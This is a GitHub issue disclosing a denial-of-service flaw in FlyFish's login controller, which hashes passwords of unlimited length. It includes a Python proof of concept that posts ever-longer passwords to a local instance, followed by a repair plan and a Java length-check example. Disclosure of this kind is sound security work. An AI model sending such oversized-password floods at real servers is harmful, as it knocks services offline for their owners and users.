CloudWise-OpenSource / FlyFish

FlyFish is a data visualization coding platform. We can create a data model quickly in a simple way, and quickly generate a set of data visualization solutions by dragging.
https://cloudwise.ai/flyFish.html
GNU General Public License v3.0

Flyfish has a DDoS vulnerability #191

Open Lianghao-Chu opened 6 months ago

Lianghao-Chu commented 6 months ago

1. Testing environment

The testing environment is VMware Workstation: Seed Ubuntu 20.04. The version is as follows:

2. Vulnerable program code location and version number

Vulnerability code location: ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.java
Test version: Flyfish open source version

3. Detailed report

When capturing the program's login, registration, and other password design operations, we found that the client directly transmitted sensitive information such as usernames and passwords in plaintext, and operated on this information without restrictions. The file ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.java includes functions for login, registration, and password modification.

Taking the login function as an example, it does not review some basic information and directly encrypts the transmitted password with MD5 encryption and compares it with database entries, but does not impose a maximum length limit on the password. Regardless of whether the incoming password is in plaintext or ciphertext form, attackers can construct packets and fill them with excessively long passwords. In the program's view, this long string is a password-related field, forcing the system to perform the password hash process on long passwords, causing the server's CPU and memory to run out, resulting in a denial of service attack on the server. This may cause the website to crash for a long time, meaning it is unusable or unresponsive.

4. POC

4.1 Environmental construction

We use Docker to build the program. First, download the docker-compose.yml file from the Gitee community, and then execute the sudo docker-compose up -d command to build the environment.

4.2 Code logic

We use the Python language to simulate random long passwords by generating random long strings. Then, we sequentially send short and long passwords to the server: the short passwords prove that the program's response time is normal, and the long passwords are used to verify the existence of denial of service attacks in the program. While sending long passwords, we also log in to the correct account in the browser to verify that this attack did indeed cause server downtime. Please refer to the video for the browser login test. The video first shows the normal login time, and then simulates a denial of service attack. As the long password is transmitted, the server's CPU and memory gradually run out, and the user login time gradually increases until it crashes. In Attack_video, we simulated the login time extension caused by a longer password. Then we continued to increase the password length and demonstrated the scenario of the program not responding.

4.3 POC code

The headers field in the code is the field obtained from the HTTP request packet during a normal login, using Wireshark packet capture.

import requests

# Front-end login route as seen in the browser; the "#/..." fragment is client-side only
# and is not sent to the server by requests.
url = "http://127.0.0.1:8089/#/flyfish/login"
# Headers copied verbatim from a normal login request captured with Wireshark.
headers = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64;rv:125.0) Gecko/20100101 Firefox/125.0","Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type":"applicationjson/json","Origin": "http://127.0.0.1:8089","Connection": "keep-alive", "Referer":"http://127.0.0.1:8089/"}

# Each iteration sends a password of 10 * i * 1000 characters (the 10-character seed
# repeated i * 1000 times), i.e. i "wan" (ten-thousands) of characters.
for i in [100, 10000, 20000, 30000, 40000, 45000, 80000]:
    passwd = "1574598741" * i * 1000
    data = {"name": "admin", "pass": passwd}
    r = requests.post(url, headers=headers, data=data, timeout=999)
    print(f"密码长度:{i} 万")                     # password length, in units of 10,000 characters
    print("响应时间:", r.elapsed.total_seconds())  # server response time in seconds
    print("-" * 20)

4.4 POC results

It can be seen that as the password length increases, the time for the server to process the request also increases. Therefore, as long as the password is long enough, the server will go down for a long time. The testing situation can be seen in the video. In Attack_video, we simulated the extension of login time caused by a longer password, then continued to increase the password length and demonstrated the scenario of the program not responding.

5. Repair plan

One possible fix is to limit the length of input data within the frontend input box, while another possible fix is to add a maximum password length limit in BaseUserController, or in the login, registration, and other functions that involve password operations. In short, as long as the maximum length of the password is limited, this problem can be solved.

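The server-side half of the repair plan, as an added example that is not FlyFish's own code: the length bound is enforced on the raw request value before any hashing work is done, so an oversized password costs the server one integer comparison instead of a digest over megabytes. The class name, the 128-character limit and the exception type are assumptions; MD5 appears only because the report says that is what the controller compares against.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.HexFormat;

public final class PasswordLengthGuard {
    // Hypothetical bound: generous for any real password, tiny next to the PoC's
    // 1,000,000+ character inputs.
    public static final int MAX_PASSWORD_LENGTH = 128;

    public static final class PasswordTooLongException extends IllegalArgumentException {
        public PasswordTooLongException(int length) {
            super("password length " + length + " exceeds maximum of " + MAX_PASSWORD_LENGTH);
        }
    }

    /** Returns the password unchanged if within bounds; throws before any hashing otherwise. */
    public static String checkLength(String password) {
        if (password == null) {
            throw new IllegalArgumentException("password is required");
        }
        if (password.length() > MAX_PASSWORD_LENGTH) {
            throw new PasswordTooLongException(password.length());
        }
        return password;
    }

    /** Length check first, then the MD5 hex digest the existing comparison expects. */
    public static String md5Hex(String password) throws NoSuchAlgorithmException {
        byte[] input = checkLength(password).getBytes(StandardCharsets.UTF_8);
        byte[] digest = MessageDigest.getInstance("MD5").digest(input);
        return HexFormat.of().formatHex(digest);
    }

    public static void main(String[] args) throws NoSuchAlgorithmException {
        System.out.println("ok: " + md5Hex("correct horse battery staple"));
        // Same shape as the PoC's smallest case: the 10-character seed repeated 100 * 1000 times.
        String oversized = "1574598741".repeat(100 * 1000);
        try {
            md5Hex(oversized);
        } catch (PasswordTooLongException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

If the server is a Spring MVC application, the same bound can also be declared on the login request DTO with Bean Validation's `@Size(max = ...)`, so the request is rejected at binding time before the controller body runs.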